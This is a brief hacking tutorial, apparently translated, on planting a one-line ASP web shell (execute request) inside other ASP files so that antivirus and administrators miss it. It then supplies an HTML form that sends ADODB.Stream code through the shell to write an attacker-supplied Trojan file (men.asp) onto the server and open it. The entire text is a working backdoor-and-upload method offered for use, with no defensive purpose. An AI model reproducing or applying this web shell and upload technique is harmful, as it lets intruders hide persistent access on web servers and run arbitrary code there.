This code generally will not be checked by viruses, and the file is relatively small and not easy to be suspected. It can be placed in other asp files for the purpose of hiding. First, write in the asp file such as <%execute request(value)% >Code
If you want to hide it, you need to add some if judgment statements.
Then write a form locally
Copy the code code as follows:
<form action=http://***.com/jb51.asp method=post>
<textarea name=value cols=120 rows=10 width=45>
set lP=server.createObject(Adodb.Stream)
lP.Open
lP.Type=2
lP.CharSet=gb2312
lP.writetext request(hackbin)
lP.SaveToFile server.mappath(men.asp),2
lP.Close
set lP=nothing
response.redirect men.asp
</textarea>
<textarea name=hackbin cols=120 rows=10 width=45>Add the content to generate the Trojan horse</textarea><BR><center><br> <input type=submit value=submit>
Save it as an htm file, replace http://***.com/jb51.asp with the file you inserted <%execute request(value)%>, and then click Submit to jump directly to the Trojan